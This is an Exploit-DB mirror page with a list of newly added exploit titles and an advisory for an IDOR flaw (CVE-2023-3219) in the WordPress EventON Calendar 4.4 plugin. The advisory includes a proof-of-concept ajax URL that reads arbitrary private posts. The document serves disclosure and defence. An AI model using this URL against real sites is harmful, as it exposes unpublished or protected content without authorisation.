bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51659.txt
Exploit-DB 010e679abe DB: 2023-08-05 
25 changes to exploits/shellcodes/ghdb

ReyeeOS 1.204.1614 - MITM Remote Code Execution (RCE)

Shelly PRO 4PM v0.11.0 - Authentication Bypass

Ozeki SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated)

Academy LMS 6.0 - Reflected XSS

Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting

Campcodes Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload

JLex GuestBook 1.6.4 - Reflected XSS

Joomla JLex Review 6.0.1 - Reflected XSS

News Portal v4.0 - SQL Injection (Unauthorized)

PHPJabbers Cleaning Business 1.0 - Reflected XSS

PHPJabbers Night Club Booking 1.0 - Reflected XSS
PHPJabbers Rental Property Booking 2.0 - Reflected XSS
PHPJabbers Service Booking Script 1.0 - Reflected XSS
PHPJabbers Shuttle Booking Software 1.0 - Reflected XSS

PHPJabbers Taxi Booking 2.0 - Reflected XSS
Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)
Webedition CMS v2.9.8.8 - Stored XSS

Webutler v3.2 - Remote Code Execution (RCE)
WordPress adivaha Travel Plugin 2.3 - Reflected XSS
WordPress adivaha Travel Plugin 2.3 - SQL Injection
Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access
Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Post Access via IDOR

WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution

WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS

Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS)
2023-08-05 00:16:32 +00:00

15 lines
No EOL
731 B
Text
Raw Permalink Blame History

# Exploit Title: Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Post Access via IDOR
# Date: 03.08.2023
# Exploit Author: Miguel Santareno
# Vendor Homepage: https://www.myeventon.com/
# Version: 4.4
# Tested on: Google and Firefox latest version
# CVE : CVE-2023-3219
# 1. Description
The plugin does not validate that the event_id parameter in its eventon_ics_download ajax action is a valid Event, allowing unauthenticated visitors to access any Post (including unpublished or protected posts) content via the ics export functionality by providing the numeric id of the post.
# 2. Proof of Concept (PoC)
Proof of Concept:
https://example.com/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=<any post id>
Reference in a new issue View git blame Copy permalink